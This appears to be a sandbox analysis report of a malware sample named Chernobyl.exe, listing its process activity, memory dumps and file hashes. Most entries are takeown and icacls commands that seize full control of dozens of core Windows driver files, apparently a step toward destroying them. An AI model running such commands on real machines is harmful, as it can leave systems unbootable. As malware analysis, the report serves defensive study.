C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\RDPCDD.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\RNDISMP.sys && icacls C:\Windows\System32\drivers\RNDISMP.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rootmdm.sys && icacls C:\Windows\System32\drivers\rootmdm.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\rspndr.sys && icacls C:\Windows\System32\drivers\rspndr.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\pcw.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\PEAuth.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Rtnic64.sys && icacls C:\Windows\System32\drivers\Rtnic64.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-1885869250-11350079999067526891005739063-2191499145573128971033198681-1837032362"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sbp2port.sys && icacls C:\Windows\System32\drivers\sbp2port.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "14860153871179050608362721579-682207943918634686-13004887871439349504-164575850"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\rdpdr.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\scfilter.sys && icacls C:\Windows\System32\drivers\scfilter.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\scsiport.sys && icacls C:\Windows\System32\drivers\scsiport.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "76477958784429748011292549551698890239640628754-150092288214763561921819903975"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\secdrv.sys && icacls C:\Windows\System32\drivers\secdrv.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-13000901662045440948725074901-81460588972051308-1660137500-8021081351318290336"

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\partmgr.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\serenum.sys && icacls C:\Windows\System32\drivers\serenum.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\serial.sys && icacls C:\Windows\System32\drivers\serial.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "8048747329891025241957932811-17732761161837744361-263129450-20369721461764937319"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-2050362543930446481-90499988819103806711056078451-349125841343755165767476491"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sermouse.sys && icacls C:\Windows\System32\drivers\sermouse.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\processr.sys /grant "Admin:F"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "15080302191105843766-14156158581689566719-1883173053-942189494-509957475640920314"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffdisk.sys && icacls C:\Windows\System32\drivers\sffdisk.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\pciide.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffp_mmc.sys && icacls C:\Windows\System32\drivers\sffp_mmc.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sffp_sd.sys && icacls C:\Windows\System32\drivers\sffp_sd.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\RDPREFMP.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\pci.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sfloppy.sys && icacls C:\Windows\System32\drivers\sfloppy.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "11413734121327494165-2106246565-931779141-2032051465168504841435267144-598385067"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sisraid2.sys && icacls C:\Windows\System32\drivers\sisraid2.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\ql40xx.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\rdpvideominiport.sys

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-2135208781-1231021867990953-1682927373-313693144-197536956712853279052110043220"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\sisraid4.sys && icacls C:\Windows\System32\drivers\sisraid4.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\smb.sys && icacls C:\Windows\System32\drivers\smb.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\portcls.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\smclib.sys && icacls C:\Windows\System32\drivers\smclib.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\spldr.sys && icacls C:\Windows\System32\drivers\spldr.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ql2300.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\rmcast.sys

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-8659022792061149527-8534093581890473652668010692-1604136439293236619-584240920"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\spsys.sys && icacls C:\Windows\System32\drivers\spsys.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "147677255376826032-14140050641130379309-2014959439657202959-1072149141-12952212"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srv.sys && icacls C:\Windows\System32\drivers\srv.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srv2.sys && icacls C:\Windows\System32\drivers\srv2.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "1040971300-1460562060-1128605090115191415615884933568088658041569864315-187875751"

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "8617384521517712910-2140313551-58412650-1121014931-3273395791434929853-127015973"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\rdyboost.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\srvnet.sys && icacls C:\Windows\System32\drivers\srvnet.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\RNDISMP.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\stexstor.sys && icacls C:\Windows\System32\drivers\stexstor.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-687184562-205507586216521651201170394098-1333549165-1105316431724233777-790564816"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\rootmdm.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\storport.sys && icacls C:\Windows\System32\drivers\storport.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\rspndr.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\storvsc.sys && icacls C:\Windows\System32\drivers\storvsc.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\stream.sys && icacls C:\Windows\System32\drivers\stream.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\swenum.sys && icacls C:\Windows\System32\drivers\swenum.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\Rtnic64.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Synth3dVsc.sys && icacls C:\Windows\System32\drivers\Synth3dVsc.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tape.sys && icacls C:\Windows\System32\drivers\tape.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tcpip.sys && icacls C:\Windows\System32\drivers\tcpip.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tcpipreg.sys && icacls C:\Windows\System32\drivers\tcpipreg.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdi.sys && icacls C:\Windows\System32\drivers\tdi.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdpipe.sys && icacls C:\Windows\System32\drivers\tdpipe.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdtcp.sys && icacls C:\Windows\System32\drivers\tdtcp.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\pciidex.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\scfilter.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\qwavedrv.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tdx.sys && icacls C:\Windows\System32\drivers\tdx.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\termdd.sys && icacls C:\Windows\System32\drivers\termdd.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\terminpt.sys && icacls C:\Windows\System32\drivers\terminpt.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tssecsrv.sys && icacls C:\Windows\System32\drivers\tssecsrv.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\raspppoe.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\TsUsbFlt.sys && icacls C:\Windows\System32\drivers\TsUsbFlt.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\TsUsbGD.sys && icacls C:\Windows\System32\drivers\TsUsbGD.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tsusbhub.sys && icacls C:\Windows\System32\drivers\tsusbhub.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\secdrv.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\scsiport.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\serial.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\serenum.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\tunnel.sys && icacls C:\Windows\System32\drivers\tunnel.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\rasacd.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\UAGP35.SYS && icacls C:\Windows\System32\drivers\UAGP35.SYS /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\sermouse.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\udfs.sys && icacls C:\Windows\System32\drivers\udfs.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ULIAGPKX.SYS && icacls C:\Windows\System32\drivers\ULIAGPKX.SYS /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\umbus.sys && icacls C:\Windows\System32\drivers\umbus.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\sffdisk.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\umpass.sys && icacls C:\Windows\System32\drivers\umpass.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\sffp_mmc.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usb8023.sys && icacls C:\Windows\System32\drivers\usb8023.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\USBCAMD2.sys && icacls C:\Windows\System32\drivers\USBCAMD2.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbccgp.sys && icacls C:\Windows\System32\drivers\usbccgp.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\sffp_sd.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\sfloppy.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\rdpbus.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbcir.sys && icacls C:\Windows\System32\drivers\usbcir.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbd.sys && icacls C:\Windows\System32\drivers\usbd.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\sisraid2.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\sisraid4.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbehci.sys && icacls C:\Windows\System32\drivers\usbehci.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\rdbss.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\rasl2tp.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbhub.sys && icacls C:\Windows\System32\drivers\usbhub.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbohci.sys && icacls C:\Windows\System32\drivers\usbohci.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\spldr.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\smclib.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbport.sys && icacls C:\Windows\System32\drivers\usbport.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\srv.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\spsys.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbprint.sys && icacls C:\Windows\System32\drivers\usbprint.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbrpm.sys && icacls C:\Windows\System32\drivers\usbrpm.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\USBSTOR.SYS && icacls C:\Windows\System32\drivers\USBSTOR.SYS /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\srvnet.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\RDPCDD.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\usbuhci.sys && icacls C:\Windows\System32\drivers\usbuhci.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\PEAuth.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vdrvroot.sys && icacls C:\Windows\System32\drivers\vdrvroot.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\pcw.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vga.sys && icacls C:\Windows\System32\drivers\vga.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\srv2.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vgapnp.sys && icacls C:\Windows\System32\drivers\vgapnp.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\stexstor.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vhdmp.sys && icacls C:\Windows\System32\drivers\vhdmp.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\viaide.sys && icacls C:\Windows\System32\drivers\viaide.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\raspptp.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\videoprt.sys && icacls C:\Windows\System32\drivers\videoprt.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\storport.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vmbus.sys && icacls C:\Windows\System32\drivers\vmbus.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\VMBusHID.sys && icacls C:\Windows\System32\drivers\VMBusHID.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vms3cap.sys && icacls C:\Windows\System32\drivers\vms3cap.sys /grant "%username%:F" && exit

C:\Windows\system32\conhost.exe

\??\C:\Windows\system32\conhost.exe "-980524762-18886927402677450231298303023-450954912-1565687764-16846797891950155024"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vmstorfl.sys && icacls C:\Windows\System32\drivers\vmstorfl.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\stream.sys

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\rdpdr.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\volmgr.sys && icacls C:\Windows\System32\drivers\volmgr.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\volmgrx.sys && icacls C:\Windows\System32\drivers\volmgrx.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\swenum.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\pcmcia.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\tcpipreg.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\volsnap.sys && icacls C:\Windows\System32\drivers\volsnap.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\tdi.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\tdtcp.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vsmraid.sys && icacls C:\Windows\System32\drivers\vsmraid.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\tdpipe.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\TsUsbFlt.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\tdx.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vwifibus.sys && icacls C:\Windows\System32\drivers\vwifibus.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\termdd.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vwififlt.sys && icacls C:\Windows\System32\drivers\vwififlt.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\vwifimp.sys && icacls C:\Windows\System32\drivers\vwifimp.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wacompen.sys && icacls C:\Windows\System32\drivers\wacompen.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\rassstp.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\tunnel.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wanarp.sys && icacls C:\Windows\System32\drivers\wanarp.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\watchdog.sys && icacls C:\Windows\System32\drivers\watchdog.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\ULIAGPKX.SYS

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\UAGP35.SYS

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\rdpvideominiport.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\udfs.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wd.sys && icacls C:\Windows\System32\drivers\wd.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\Wdf01000.sys && icacls C:\Windows\System32\drivers\Wdf01000.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\tcpip.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\tape.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\Synth3dVsc.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\WdfLdr.sys && icacls C:\Windows\System32\drivers\WdfLdr.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wfplwf.sys && icacls C:\Windows\System32\drivers\wfplwf.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\umbus.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wimmount.sys && icacls C:\Windows\System32\drivers\wimmount.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\winhv.sys && icacls C:\Windows\System32\drivers\winhv.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\rmcast.sys /grant "Admin:F"

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\usbccgp.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wmiacpi.sys && icacls C:\Windows\System32\drivers\wmiacpi.sys /grant "%username%:F" && exit

C:\Windows\system32\icacls.exe

icacls C:\Windows\System32\drivers\portcls.sys /grant "Admin:F"

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\wmilib.sys && icacls C:\Windows\System32\drivers\wmilib.sys /grant "%username%:F" && exit

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\ws2ifsl.sys && icacls C:\Windows\System32\drivers\ws2ifsl.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\usbcir.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\WUDFPf.sys && icacls C:\Windows\System32\drivers\WUDFPf.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\terminpt.sys

C:\Windows\System32\cmd.exe

"C:\Windows\System32\cmd.exe" /k takeown /f C:\Windows\System32\drivers\WUDFRd.sys && icacls C:\Windows\System32\drivers\WUDFRd.sys /grant "%username%:F" && exit

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\tssecsrv.sys

C:\Windows\system32\takeown.exe

takeown /f C:\Windows\System32\drivers\usbehci.sys

Network

N/A

Files

memory/2812-0-0x000000013FDE0000-0x000000013FE4C000-memory.dmp

memory/2812-1-0x000007FEF53D0000-0x000007FEF5DBC000-memory.dmp

memory/2812-2-0x000000001BB30000-0x000000001BBB0000-memory.dmp

memory/2812-3-0x000007FEF53D0000-0x000007FEF5DBC000-memory.dmp

C:\Users\Admin\Desktop\9╤☻▀ž¼♀╩æäñ4«µ☼č▌¼ø¥○▬╠▀¥▌«ä1Æ4ń8ö™♠9╥╧√☺♫®☼♣₧5♫╤▐♣™▌õ®■♀▼čš▄®▐☺√♣²╩█ΣÇ■♠φ6♦╩╩ß₧╩¥▄Ÿ54å×½8♥š♠◄∞╠♦¾○™

MD5 9e1e5883c74742a497cf5c272ccd2321
SHA1 2cf33e34d08b8e17743a60352baffef4b6f02dee
SHA256 ca687b6a7c3d29b566f3e1988b9f877b51d9a83ee25ffe0755a8dcd3eb5f434a
SHA512 f2284f0c624cc07a65c16f87865bb98aaa176b1d8b45cd4fbcc1143c9c2297fe6b1d4db55ef054be2bc151c8cc25ff4da7c997b7d38dae3dccd2ffe1c3c01a6b

memory/2812-105-0x000000001BB30000-0x000000001BBB0000-memory.dmp

\Users\Admin\AppData\Local\Temp\Chernobyl.exe

MD5 42d232a366705a95af9babb269a251b1
SHA1 015b04d84cf13b8c93d11cc8c80a0f4571fb6847
SHA256 97609ae0b6b53252439d92caf6261c32cad76a69c93047c336cc5c42b458af3d
